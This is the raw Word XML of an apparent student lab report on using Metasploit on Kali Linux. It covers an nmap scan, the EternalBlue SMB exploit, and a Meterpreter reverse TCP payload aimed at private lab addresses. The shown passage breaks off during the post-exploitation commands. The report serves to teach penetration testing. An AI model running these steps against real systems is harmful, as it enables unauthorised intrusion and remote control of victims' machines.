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A66" w:rsidRPr="00AD4AF3" w:rsidRDefault="00DB3A66" w:rsidP="00DB3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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD4A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US"/>
        </w:rPr>
        <w:t>TITLE :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD4A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 xml:space="preserve"> Implementation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4A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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4A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 xml:space="preserve"> on Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="0090369E" w:rsidRPr="00AD4A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 xml:space="preserve"> Version-6</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4A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 xml:space="preserve"> using Command Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3A66" w:rsidRPr="00AD4AF3" w:rsidRDefault="008D29D3" w:rsidP="00DB3A6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AD4AF3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pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2A4B" w:rsidRPr="004D2A4B" w:rsidRDefault="004D2A4B" w:rsidP="004D2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</w:pPr>
      <w:r w:rsidRPr="00AD4A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1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2A4B" w:rsidRPr="004D2A4B" w:rsidRDefault="004D2A4B" w:rsidP="004D2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4D2A4B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With the rise of cyber threats, penetration testing has become a crucial aspect of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2A4B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cybersecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2A4B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. One of the most widely used frameworks for ethical hacking and penetration testing is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD4A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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD4A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 xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="004D2A4B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. This document provides a theoretical and practical implementation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2A4B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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2A4B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on </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4A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Kali Linux Version-6</w:t>
      </w:r>
      <w:r w:rsidRPr="004D2A4B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, using the command terminal for execution. The goal is to demonstrate network scanning, exploit selection, payload configuration, and post-exploitation activities in a structured manner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2A4B" w:rsidRPr="00DB3A66" w:rsidRDefault="00555D16" w:rsidP="00DB3A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555D1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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4438650" cy="2819400"/>
            <wp:effectExtent l="1905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A66" w:rsidRPr="004D2A4B" w:rsidRDefault="004D2A4B" w:rsidP="00DB3A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2</w:t>
      </w:r>
      <w:r w:rsidR="00DB3A66" w:rsidRPr="004D2A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. Our Group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A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</w:pPr>
      <w:r w:rsidRPr="004D2A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Team members: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B3A66" w:rsidRPr="004D2A4B" w:rsidTr="00DB3A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>Name of member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>Roll number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidTr="00DB3A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>Soumil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004D2A4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2A4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/>
              </w:rPr>
              <w:t>Mukhopadhyay</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>16010122257</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidTr="00DB3A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>Akshad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004D2A4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2A4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/>
              </w:rPr>
              <w:t>Kakad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>16010122258</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidTr="00DB3A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>Shubham</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004D2A4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2A4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/>
              </w:rPr>
              <w:t>Satpute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>16010122259</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidTr="00DB3A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>Shivam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004D2A4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2A4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/>
              </w:rPr>
              <w:t>Chandak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3A6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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D2A4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/>
              </w:rPr>
              <w:t>16010122271</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001C3EA4" w:rsidRPr="001C3EA4" w:rsidRDefault="001C3EA4" w:rsidP="001C3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</w:pPr>
      <w:r w:rsidRPr="00113A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3. Security Tool Selection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3EA4" w:rsidRPr="001C3EA4" w:rsidRDefault="001C3EA4" w:rsidP="001C3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1C3EA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The chosen security tool for this project is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00113A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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00113A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 xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="001C3EA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, a powerful penetration testing platform that allows security professionals to </w:t>
      </w:r>
      <w:r w:rsidRPr="001C3EA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lastRenderedPageBreak/>
        <w:t>identify vulnerabilities, develop exploits, and execute attacks within a controlled environment. It is widely used for ethical hacking, vulnerability assessment, and security auditing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Demonstration of Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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6F10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4.1 Installing and Setting Up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00876F10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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comes pre-installed with Kali Linux. However, if not installed, it can be set up using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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apt update &amp;&amp;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install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>-framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before launching </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database service must be started:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To initiate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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6F10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4.2 Network Scanning with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00876F10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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before exploiting a target, it is necessary to gather information about the network and discover active hosts and open ports. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a powerful tool used for network scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Command to scan a specific target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A -T4 &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A -T4 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>This scan provides details about running services, open ports, and potential vulnerabilities of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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6F10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4.3 Selecting an Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> offers a vast repository of exploits. Users can search for specific exploits related to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>To search for available SMB-related exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Example of selecting an exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This exploit targets the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerability found in older Windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="00D31D43" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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D43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4.4 Setting the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>A payload determines the actions to be performed on the target after exploitation. The following payload creates a reverse connection to the attacker's system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Next, configure the target’s IP (RHOSTS) and the attacker's IP (LHOST):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F1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set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F1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set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST 192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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6F10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4.5 Exploit Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Once the exploit and payload are configured, execute the attack using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upon successful execution, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is opened, granting remote access to the target:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="00E5332F" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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332F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4.6 Post-Exploitation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>After gaining access, various commands can be executed to extract information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check user privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
